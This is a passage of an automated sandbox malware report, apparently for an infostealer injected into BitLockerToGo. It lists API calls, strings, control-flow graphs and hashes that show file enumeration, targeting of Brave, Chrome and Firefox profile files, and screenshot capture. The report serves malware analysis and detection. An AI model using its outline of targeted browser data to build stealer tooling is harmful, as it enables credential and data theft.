                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                                                                                                • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                                                                                                                                                • API String ID: 3334442632-726946144
                                                                                                                                                                • Opcode ID: 8ad2f2f263f3922307a1956ecbfa5d6f9bf412a0a8abeb936a047c8ac4e52cc2
                                                                                                                                                                • Instruction ID: 850edfaad06514ef2ec882311a1688b214d93078585be511345f14267c448cd5
                                                                                                                                                                • Opcode Fuzzy Hash: 8ad2f2f263f3922307a1956ecbfa5d6f9bf412a0a8abeb936a047c8ac4e52cc2
                                                                                                                                                                • Instruction Fuzzy Hash: 3D42677AA122049BDB14FB70DD95EEE737DAFC4310F408558E50A9B180EF349B59CBA1

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 2131 6cc735a0-6cc735be 2132 6cc735c4-6cc735ed InitializeCriticalSectionAndSpinCount getenv 2131->2132 2133 6cc738e9-6cc738fb call 6ccab320 2131->2133 2134 6cc735f3-6cc735f5 2132->2134 2135 6cc738fc-6cc7390c strcmp 2132->2135 2139 6cc735f8-6cc73614 QueryPerformanceFrequency 2134->2139 2135->2134 2138 6cc73912-6cc73922 strcmp 2135->2138 2140 6cc73924-6cc73932 2138->2140 2141 6cc7398a-6cc7398c 2138->2141 2142 6cc7374f-6cc73756 2139->2142 2143 6cc7361a-6cc7361c 2139->2143 2146 6cc73622-6cc7364a _strnicmp 2140->2146 2147 6cc73938 2140->2147 2141->2139 2144 6cc7396e-6cc73982 2142->2144 2145 6cc7375c-6cc73768 2142->2145 2143->2146 2148 6cc7393d 2143->2148 2144->2141 2149 6cc7376a-6cc737a1 QueryPerformanceCounter EnterCriticalSection 2145->2149 2150 6cc73944-6cc73957 _strnicmp 2146->2150 2151 6cc73650-6cc7365e 2146->2151 2147->2142 2148->2150 2152 6cc737b3-6cc737eb LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 2149->2152 2153 6cc737a3-6cc737b1 2149->2153 2150->2151 2154 6cc7395d-6cc7395f 2150->2154 2151->2154 2155 6cc73664-6cc736a9 GetSystemTimeAdjustment 2151->2155 2156 6cc737ed-6cc737fa 2152->2156 2157 6cc737fc-6cc73839 LeaveCriticalSection 2152->2157 2153->2152 2158 6cc73964 2155->2158 2159 6cc736af-6cc73749 call 6ccac110 2155->2159 2156->2157 2160 6cc73846-6cc738ac call 6ccac110 2157->2160 2161 6cc7383b-6cc73840 2157->2161 2158->2144 2159->2142 2166 6cc738b2-6cc738ca 2160->2166 2161->2149 2161->2160 2167 6cc738dd-6cc738e3 2166->2167 2168 6cc738cc-6cc738db 2166->2168 2167->2133 2168->2166 2168->2167
                                                                                                                                                                APIs
                                                                                                                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(6CCFF688,00001000), ref: 6CC735D5
                                                                                                                                                                • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6CC735E0
                                                                                                                                                                • QueryPerformanceFrequency.KERNEL32(?), ref: 6CC735FD
                                                                                                                                                                • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6CC7363F
                                                                                                                                                                • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6CC7369F
                                                                                                                                                                • __aulldiv.LIBCMT ref: 6CC736E4
                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 6CC73773
                                                                                                                                                                • EnterCriticalSection.KERNEL32(6CCFF688), ref: 6CC7377E
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(6CCFF688), ref: 6CC737BD
                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 6CC737C4
                                                                                                                                                                • EnterCriticalSection.KERNEL32(6CCFF688), ref: 6CC737CB
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(6CCFF688), ref: 6CC73801
                                                                                                                                                                • __aulldiv.LIBCMT ref: 6CC73883
                                                                                                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6CC73902
                                                                                                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6CC73918
                                                                                                                                                                • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6CC7394C
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
                                                                                                                                                                • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
                                                                                                                                                                • API String ID: 301339242-3790311718
                                                                                                                                                                • Opcode ID: 45e3d5a85c90825ad5f226f24a490ca4ad8753d5719a8dcdb7e7eadbdf964fea
                                                                                                                                                                • Instruction ID: e2636151e0c2a0655e562c2a6f3d89cc2219f165eb4ac23dde7d5e4abfb5dd9a
                                                                                                                                                                • Opcode Fuzzy Hash: 45e3d5a85c90825ad5f226f24a490ca4ad8753d5719a8dcdb7e7eadbdf964fea
                                                                                                                                                                • Instruction Fuzzy Hash: AFB18FB1B052109FDB189F28D85561A7BF5FF8A700F09892EE9A9D7750EB30D801CB91

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • wsprintfA.USER32 ref: 0301492C
                                                                                                                                                                • FindFirstFileA.KERNEL32(?,?), ref: 03014943
                                                                                                                                                                • StrCmpCA.SHLWAPI(?,03020FDC), ref: 03014971
                                                                                                                                                                • StrCmpCA.SHLWAPI(?,03020FE0), ref: 03014987
                                                                                                                                                                • FindNextFileA.KERNEL32(000000FF,?), ref: 03014B7D
                                                                                                                                                                • FindClose.KERNEL32(000000FF), ref: 03014B92
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Find$File$CloseFirstNextwsprintf
                                                                                                                                                                • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                                                • API String ID: 180737720-445461498
                                                                                                                                                                • Opcode ID: 4e2209509d91bef57a6760bbaaa1d1298dcbab710c197dc83a3edf3ed43d5716
                                                                                                                                                                • Instruction ID: bc22749c13789fceea8cbe0e44865f94c74803b1166769339539ce5d12b3a25d
                                                                                                                                                                • Opcode Fuzzy Hash: 4e2209509d91bef57a6760bbaaa1d1298dcbab710c197dc83a3edf3ed43d5716
                                                                                                                                                                • Instruction Fuzzy Hash: 556166B6940218ABDB24FBA0EC48EEE77BCFB48701F048588F60996144EB759755CF91

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0301906C
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateGlobalStream
                                                                                                                                                                • String ID: image/jpeg
                                                                                                                                                                • API String ID: 2244384528-3785015651
                                                                                                                                                                • Opcode ID: 2251243d235aa0d7495644ca012fa17718f19fb5bc017cf83efa202cddf42e16
                                                                                                                                                                • Instruction ID: dcf3fcf1501309f11ba672f4815e4233f92245059db4936a9ef82ab26e8b8f0d
                                                                                                                                                                • Opcode Fuzzy Hash: 2251243d235aa0d7495644ca012fa17718f19fb5bc017cf83efa202cddf42e16
                                                                                                                                                                • Instruction Fuzzy Hash: 0F71F179950208EBDB14EFE4E998FDEB7B9FF48700F108508F515AB284DB74A905CB60
                                                                                                                                                                APIs
                                                                                                                                                                • wsprintfA.USER32 ref: 03013EC3
                                                                                                                                                                • FindFirstFileA.KERNEL32(?,?), ref: 03013EDA
                                                                                                                                                                • StrCmpCA.SHLWAPI(?,03020FAC), ref: 03013F08
                                                                                                                                                                • StrCmpCA.SHLWAPI(?,03020FB0), ref: 03013F1E
                                                                                                                                                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0301406C
                                                                                                                                                                • FindClose.KERNEL32(000000FF), ref: 03014081
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Find$File$CloseFirstNextwsprintf
                                                                                                                                                                • String ID: %s\%s
                                                                                                                                                                • API String ID: 180737720-4073750446
                                                                                                                                                                • Opcode ID: 8d9e350483bcf8edc3fa851fba3d75a84d2c23a38760cfb3e796b4178026a323
                                                                                                                                                                • Instruction ID: b4961a897ab69f58d5c59331af2546de9f2e2bacc8414a1ba729573e252eef91
                                                                                                                                                                • Opcode Fuzzy Hash: 8d9e350483bcf8edc3fa851fba3d75a84d2c23a38760cfb3e796b4178026a323
                                                                                                                                                                • Instruction Fuzzy Hash: 3E5147BA941318ABCB24FBB0EC49EEE737CBB48300F048588F65996084DB75D7958F50
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0301A740: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A788
                                                                                                                                                                  • Part of subcall function 0301A920: lstrcpy.KERNEL32(00000000,?), ref: 0301A972
                                                                                                                                                                  • Part of subcall function 0301A920: lstrcat.KERNEL32(00000000), ref: 0301A982
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrlen.KERNEL32(?,03021110,?,00000000,03020AEF), ref: 0301A9C5
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcpy.KERNEL32(00000000), ref: 0301AA04
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0301AA12
                                                                                                                                                                  • Part of subcall function 0301A8A0: lstrcpy.KERNEL32(?,03020AEF), ref: 0301A905
                                                                                                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,030215B8,03020D96), ref: 0300F71E
                                                                                                                                                                • StrCmpCA.SHLWAPI(?,030215BC), ref: 0300F76F
                                                                                                                                                                • StrCmpCA.SHLWAPI(?,030215C0), ref: 0300F785
                                                                                                                                                                • FindNextFileA.KERNELBASE(000000FF,?), ref: 0300FAB1
                                                                                                                                                                • FindClose.KERNEL32(000000FF), ref: 0300FAC3
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                                                                                                • String ID: prefs.js
                                                                                                                                                                • API String ID: 3334442632-3783873740
                                                                                                                                                                • Opcode ID: 21c5388634d23e5f2e7508dd552b3b60954b7b97bf5434b66eb6b4b7fbbfb23a
                                                                                                                                                                • Instruction ID: 6603fd991fb64c069a774559a56fa5d282c1fd24e26682367e84568676762607
                                                                                                                                                                • Opcode Fuzzy Hash: 21c5388634d23e5f2e7508dd552b3b60954b7b97bf5434b66eb6b4b7fbbfb23a
                                                                                                                                                                • Instruction Fuzzy Hash: D7B13575A022189BDB24FF60DD94EEE7379AF94310F4085A9A40A9F180EF705B5ACF91
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0301A740: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A788
                                                                                                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,03025104,?,03001F2C,?,030251AC,?,?,00000000,?,00000000), ref: 03001923
                                                                                                                                                                • StrCmpCA.SHLWAPI(?,03025254), ref: 03001973
                                                                                                                                                                • StrCmpCA.SHLWAPI(?,030252FC), ref: 03001989
                                                                                                                                                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 03001D40
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000), ref: 03001DCA
                                                                                                                                                                • FindNextFileA.KERNEL32(000000FF,?), ref: 03001E20
                                                                                                                                                                • FindClose.KERNEL32(000000FF), ref: 03001E32
                                                                                                                                                                  • Part of subcall function 0301A920: lstrcpy.KERNEL32(00000000,?), ref: 0301A972
                                                                                                                                                                  • Part of subcall function 0301A920: lstrcat.KERNEL32(00000000), ref: 0301A982
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrlen.KERNEL32(?,03021110,?,00000000,03020AEF), ref: 0301A9C5
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcpy.KERNEL32(00000000), ref: 0301AA04
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0301AA12
                                                                                                                                                                  • Part of subcall function 0301A8A0: lstrcpy.KERNEL32(?,03020AEF), ref: 0301A905
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                                                                                                                                                • String ID: \*.*
                                                                                                                                                                • API String ID: 1415058207-1173974218
                                                                                                                                                                • Opcode ID: 43a3640b7fc5c10c7e55f445546d9adb7ccb4cbc4626503fa0092666b22aca8b
                                                                                                                                                                • Instruction ID: 736e7d75dc554e80a8121335e5e8bd9ee9652f57e57a2ae071a5102b7343698b
                                                                                                                                                                • Opcode Fuzzy Hash: 43a3640b7fc5c10c7e55f445546d9adb7ccb4cbc4626503fa0092666b22aca8b
                                                                                                                                                                • Instruction Fuzzy Hash: 0912FA79A132189BDB19FB60DD94EEE737CAF94310F4041D9A5066A090EF706F9ACF90
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0301A740: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A788
                                                                                                                                                                  • Part of subcall function 0301A920: lstrcpy.KERNEL32(00000000,?), ref: 0301A972
                                                                                                                                                                  • Part of subcall function 0301A920: lstrcat.KERNEL32(00000000), ref: 0301A982
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrlen.KERNEL32(?,03021110,?,00000000,03020AEF), ref: 0301A9C5
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcpy.KERNEL32(00000000), ref: 0301AA04
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0301AA12
                                                                                                                                                                  • Part of subcall function 0301A8A0: lstrcpy.KERNEL32(?,03020AEF), ref: 0301A905
                                                                                                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,030214B0,03020C2A), ref: 0300DAEB
                                                                                                                                                                • StrCmpCA.SHLWAPI(?,030214B4), ref: 0300DB33
                                                                                                                                                                • StrCmpCA.SHLWAPI(?,030214B8), ref: 0300DB49
                                                                                                                                                                • FindNextFileA.KERNELBASE(000000FF,?), ref: 0300DDCC
                                                                                                                                                                • FindClose.KERNEL32(000000FF), ref: 0300DDDE
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
